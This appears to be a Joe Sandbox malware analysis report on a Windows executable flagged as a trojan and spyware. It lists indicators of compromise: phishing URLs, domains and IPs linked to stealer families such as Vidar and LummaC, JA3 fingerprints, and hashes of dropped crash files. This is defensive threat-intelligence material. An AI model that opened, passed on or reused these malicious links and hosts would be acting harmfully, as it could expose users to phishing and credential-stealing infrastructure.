                                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                Overall analysis duration:0h 7m 9s
                                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                Number of analysed new started processes analysed:30
                                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                                Sample name:aD7D9fkpII.exe
                                                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                                                Original Sample Name:6b3fbdaf99ece34f12dc443f1c630812.exe
                                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@76/282@24/20
                                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 66.7%
                                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 99%
                                                                                                                                                                                                                                                • Number of executed functions: 75
                                                                                                                                                                                                                                                • Number of non-executed functions: 107
                                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 172.217.19.227, 142.250.181.142, 173.194.220.84, 172.217.17.46, 172.217.21.35, 142.250.181.74, 172.217.17.74, 172.217.19.202, 216.58.208.234, 172.217.21.42, 142.250.181.138, 172.217.19.234, 172.217.19.10, 142.250.181.106, 172.217.17.42, 142.250.181.42, 13.89.179.12, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 13.107.6.158, 172.165.69.228, 2.19.198.56, 23.32.238.138, 23.32.238.187, 23.32.238.202, 23.32.238.216, 23.32.238.186, 23.32.238.208, 23.32.238.194, 23.32.238.203, 23.32.238.211, 23.32.238.219, 95.100.135.112, 95.100.135.90, 95.100.135.91, 95.100.135.106, 95.100.135.104, 95.100.135.82, 95.100.135.107, 95.100.135.105, 95.100.135.83, 13.87.96.169, 2.16.158.91, 2.16.158.90, 2.16.158.170, 2.16.158.83, 2.16.158.75, 2.16.158.169, 2.16.158.80, 2.16.158.82, 2.16.158.88, 199.232.210.172, 2.19.198.73, 23.32.238.96, 142.251.41.3, 142.251.40.195, 142.250.176.195, 20.190.147.9, 13.107.246.63, 172.202.163.200, 23.218.208.109, 94
                                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, onedsblobprdcus17.centralus.cloudapp.azure.com, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, prod-atm-wds-edge.trafficmanager.net, deff.nelreports.net.akamaized.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, blobcollector.events.data.trafficmanager.net, edgeassetservice.azureedge.net, umwatson.events.data.microsoft.com, clients.l.google.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, redirector.gvt1.com, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.c
                                                                                                                                                                                                                                                • Execution Graph export aborted for target aD7D9fkpII.exe, PID 572 because there are no executed function
                                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                                02:20:25API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                2.16.158.176skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  http://elizgallery.com/js.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    52.168.117.170file.exeGet hashmaliciousPureCrypter, Amadey, Cerbfyne Stealer, Credential Flusher, Cryptbot, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                                                      3e5cb809-f546-fb3c-b0e3-5de228b453ab.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          https://8jkfw9cqp7ep.z13.web.core.windows.net/?zpbid=78432_55610c1d-9229-11ef-824f-03718b6de7bb#Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                                                                                                                                                            https://merzcon-my.sharepoint.com/:f:/g/personal/cnico_merzcon_onmicrosoft_com/EmjHG5K9dP9BtgBBeTTFhjABJRRLGM6IhVrJlwBTMWY8rg?e=pfkS1fGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              Message_2551600.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                fa5a527b.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                  Message_2477367.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    https://eficensitcom-my.sharepoint.com/:f:/g/personal/prathyushap_eficensit_com/EmmWsEjkvfRJorJdypQBJdYBR0PBdaEDGU2Tg4-Q6_4WZw?e=8wSnKh&xsdata=MDV8MDJ8dGhvbWFzLmhvZXZlbEBoeWRyYXRpZ2h0LmNvbXwyZjliZjI0NTdmZDI0NDRiNzk1NzA4ZGNkMmYxZTdlNXwxNjAyYWU4MjAyNjY0MGQ2OTEwYjExNjgwZmUwZjZhNXwwfDB8NjM4NjE3MTgzNjU0MDEzNTQyfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=UWhyaGFVOWYxMGt6Z1piU1hUTDdKa2VCeVdQWUZwd2NwR09TSmE2eC9xVT0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                      https://nmgovdot-my.sharepoint.com/:f:/g/personal/brian_filip_nmgov_co/EopUqBu8fqpOvw_R7W8qXnEBWw032PoWoE-pjka6mBLMVw?e=G3klTxGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                                                                                                        149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                                        http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                                        http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                                        http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                                        http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                                        http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/?setln=pl
                                                                                                                                                                                                                                                                        http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                                        http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.dog/
                                                                                                                                                                                                                                                                        LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                                        • t.me/cinoshibot
                                                                                                                                                                                                                                                                        jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                                        • t.me/cinoshibot

                                                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        t.meinstaller.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        yoda.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        bijutr.shopinstaller.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        yoda.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        chrome.cloudflare-dns.cominstaller.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                        skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                        din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                        WRD1792.docx.docGet hashmaliciousDynamerBrowse
                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                        HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                        PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                        https://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                        ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                        SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                        ssl.bingadsedgeextension-prod-europe.azurewebsites.netinstaller.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                                        skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                                        din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                                        HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                                        PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                                        ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                                        nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                                        gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                                        trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 94.245.104.56

                                                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        AKAMAI-ASN1EUinstaller.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 23.209.72.7
                                                                                                                                                                                                                                                                        skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 2.16.158.83
                                                                                                                                                                                                                                                                        din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 23.44.201.32
                                                                                                                                                                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 23.209.72.40
                                                                                                                                                                                                                                                                        z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        AiaStwRBdI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        HJVzgKyC0y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        rUfr2hQGOb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        YhF4vhbnMW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUSinstaller.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 20.42.73.30
                                                                                                                                                                                                                                                                        din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 51.104.15.253
                                                                                                                                                                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 204.79.197.219
                                                                                                                                                                                                                                                                        phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 52.109.68.129
                                                                                                                                                                                                                                                                        phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 20.42.73.24
                                                                                                                                                                                                                                                                        HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 204.79.197.219
                                                                                                                                                                                                                                                                        Google Authenticator You're trying to sign in from a new location.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 52.109.28.46
                                                                                                                                                                                                                                                                        xd.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 20.16.86.154
                                                                                                                                                                                                                                                                        xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 40.92.218.88
                                                                                                                                                                                                                                                                        xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 104.209.1.224
                                                                                                                                                                                                                                                                        AKAMAI-ASN1EUinstaller.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 23.209.72.7
                                                                                                                                                                                                                                                                        skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 2.16.158.83
                                                                                                                                                                                                                                                                        din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 23.44.201.32
                                                                                                                                                                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 23.209.72.40
                                                                                                                                                                                                                                                                        z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        AiaStwRBdI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        HJVzgKyC0y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        rUfr2hQGOb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        YhF4vhbnMW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106

                                                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        1138de370e523e824bbca92d049a3777lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 23.1.237.91
                                                                                                                                                                                                                                                                        0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.1.237.91
                                                                                                                                                                                                                                                                        pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.1.237.91
                                                                                                                                                                                                                                                                        z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.1.237.91
                                                                                                                                                                                                                                                                        COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.1.237.91
                                                                                                                                                                                                                                                                        HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 23.1.237.91
                                                                                                                                                                                                                                                                        iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 23.1.237.91
                                                                                                                                                                                                                                                                        ElmEHL9kP9.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 23.1.237.91
                                                                                                                                                                                                                                                                        https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 23.1.237.91
                                                                                                                                                                                                                                                                        gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 23.1.237.91
                                                                                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        yoda.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        libcurl.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        • 188.245.216.205
                                                                                                                                                                                                                                                                        b8ygJBG5cb.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                                        • 188.245.216.205

                                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_aD7D9fkpII.exe_c55a259761662d66335c138d16911943150cfb0_990ac6de_7c3147b2-b665-4f9a-855d-08e45c098d98\Report.wer

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                        Entropy (8bit):0.7187577858203742
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:K3FeDGUIlfWsfsh1yDfUQXIDcQvc6QcEVcw3cE/3+HbHg/8BRTf3o8Fa9OyWZAX0:I0DGUyWe0BU/Qj/qzuiFRZ24IO8Ojo
                                                                                                                                                                                                                                                                        MD5:4DD77B8D433136AE9A855852F37E0972
                                                                                                                                                                                                                                                                        SHA1:B4C2114B2B3BF5CA8DE00B4572F9E4B81DEF5338
                                                                                                                                                                                                                                                                        SHA-256:C6CB89DFC936AE37D348C78DC5C5E17C617BC16346ECB3F3188C063AD67D1F58
                                                                                                                                                                                                                                                                        SHA-512:26D2DAB9E3B74B39D1BB76708C6D3161787F93E144D6FCF9CBDF23B2C5F6F790D5188CB29F788568D8DD5B7B377B5F675A8A123FAFE405ABFE1B4FB0CA2DD069
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.7.5.7.5.9.7.6.3.4.2.0.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.7.5.7.5.9.7.9.4.6.7.0.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.3.1.4.7.b.2.-.b.6.6.5.-.4.f.9.a.-.8.5.5.d.-.0.8.e.4.5.c.0.9.8.d.9.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.a.0.7.9.6.4.-.1.f.9.f.-.4.7.8.8.-.8.0.d.6.-.1.c.8.e.b.0.f.5.7.c.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.D.7.D.9.f.k.p.I.I...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.p.c.P.i.n.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.0.8.-.0.0.0.1.-.0.0.1.4.-.f.e.c.0.-.4.a.b.b.2.f.5.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.8.f.e.4.d.d.b.1.2.e.2.2.3.9.6.d.b.2.4.b.9.7.7.f.f.e.c.1.5.d.5.0.0.0.0.0.9.0.4.!.0.0.0.0.6.c.5.5.3.a.c.9.9.2.9.5.b.a.2.d.0.2.d.6.a.a.d.f.c.7.1.0.7.3.d.6.2.b.2.d.

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER7533.tmp.dmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Fri Dec 27 07:19:57 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):43484
                                                                                                                                                                                                                                                                        Entropy (8bit):1.687817517235187
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:XDyW2GyOlxa57BjDfov++w5Ai50h1h4QHv4etrPvbn:TyWxcBfmk5Ai6h1h4QHvbtrD
                                                                                                                                                                                                                                                                        MD5:18457FC8848F19E7E32F214570AD52F9
                                                                                                                                                                                                                                                                        SHA1:74C4DBE66DFB3EF8924BA4D1D5DA3899F2602EA5
                                                                                                                                                                                                                                                                        SHA-256:FBC7AE198546349FAF37B9444E5806151E43A6D0200E55C225BECE5F66FD0354
                                                                                                                                                                                                                                                                        SHA-512:FEAF3DB4C0F3A824C995B55252E58FDB5779D3E49C31DB999A12502B6FDDC97770033D6C30299A6CB5CD3B4B3E2372A0C2BFC6FB4FA94FF84ABEC3061F76236D
                                                                                                                                                                                                                                                                        Malicious:false
